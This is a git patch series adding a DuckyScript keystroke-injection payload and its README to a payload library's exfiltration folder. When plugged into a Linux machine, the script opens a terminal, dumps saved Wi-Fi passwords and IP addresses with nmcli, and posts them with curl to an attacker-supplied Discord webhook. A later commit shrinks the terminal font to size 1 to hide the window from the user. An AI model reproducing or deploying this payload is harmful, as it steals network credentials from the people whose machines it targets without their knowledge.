From 309209c29d211ba634125ee1dd91120e1b20f794 Mon Sep 17 00:00:00 2001 From: Simen <97337442+simen64@users.noreply.github.com> Date: Fri, 24 May 2024 23:46:30 +0200 Subject: [PATCH 1/3] Create payload.txt --- .../Wifi-Creds-Discord-Linux/payload.txt | 42 +++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt new file mode 100644 index 00000000..e72775c4 --- /dev/null +++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt @@ -0,0 +1,42 @@ +REM_BLOCK +############################################### +# | +# Title : Get Linux wifi credentials | +# Author : simen64 | +# Version : 1.0 | +# Category : Exfiltration | +# Target : Linux | +# | +############################################### +END_REM + +REM change to your keyboard layout +DUCKY_LANG NO + +REM put your discord webhook here +DEFINE #dc webhook here + +DELAY 2000 +CAPSLOCK_DISABLE +DEFAULT_DELAY 10 + +REM_BLOCK +Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line) +ALT F2 +DELAY 200 +STRINGLN xterm +DELAY 500 +END_REM + +REM_BLOCK +Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line) +CTRL-ALT t +DELAY 500 +END_REM + +STRING output=$(nmcli dev wifi show-password && nmcli | grep "inet4\|inet6" | grep -v "127.0.0.1\|::1" | sed 's/ +CTRL v +TAB +STRINGLN //') +STRINGLN escaped_output=$(printf '%s' "$output" | jq -sRr @json) +STRINGLN curl -H "Content-Type: application/json" -d "{\"username\": \"Wifi grabber\", \"content\": $escaped_output}" "#dc" && exit From 6f434b384d9da8717a951d8b4c2350482f056ea9 Mon Sep 17 00:00:00 2001 From: Simen <97337442+simen64@users.noreply.github.com> Date: Fri, 24 May 2024 23:49:49 +0200 Subject: [PATCH 2/3] Create README.md --- .../Wifi-Creds-Discord-Linux/README.md | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md new file mode 100644 index 00000000..a9cd8c52 --- /dev/null +++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/README.md @@ -0,0 +1,35 @@ +# Exfiltrate wifi creds of a linux system to a discord webhook + +This payload grabs the wifi credentials on a linux system and sens it to you with a discord webhook. + +## Getting started + +### Dependencies +- Linux +- Bash +- Network Manager + +### Prerequisites + +If your target uses Gnome, uncomment this line in the payload (uncomment by removing `REM_BLOCK` and `END_REM`: +``` +REM_BLOCK +Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line) +ALT F2 +DELAY 200 +STRINGLN xterm +DELAY 500 +END_REM +``` + +If your target uses a DE or WM that lets you open a terminal with ctrl-alt-t uncomment this line: +``` +REM_BLOCK +Use this if your targets DE or WM has the ctrl-alt-t shortcut (remove REM_BLOCK and END_REM + this line) +CTRL-ALT t +DELAY 500 +END_REM +``` + +## Settings +- #dc your discord webhook From 70fb09b6e6c4f1bec29e152d25502e6247d0baac Mon Sep 17 00:00:00 2001 From: Simen <97337442+simen64@users.noreply.github.com> Date: Mon, 12 Aug 2024 23:39:23 +0200 Subject: [PATCH 3/3] Add xterm option for making window smaller --- .../library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt index e72775c4..8f157bd0 100644 --- a/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt +++ b/payloads/library/exfiltration/Wifi-Creds-Discord-Linux/payload.txt @@ -24,7 +24,7 @@ REM_BLOCK Use this if your target is using Gnome (remove REM_BLOCK and END_REM + this line) ALT F2 DELAY 200 -STRINGLN xterm +STRINGLN xterm -fa monaco -fs 1 DELAY 500 END_REM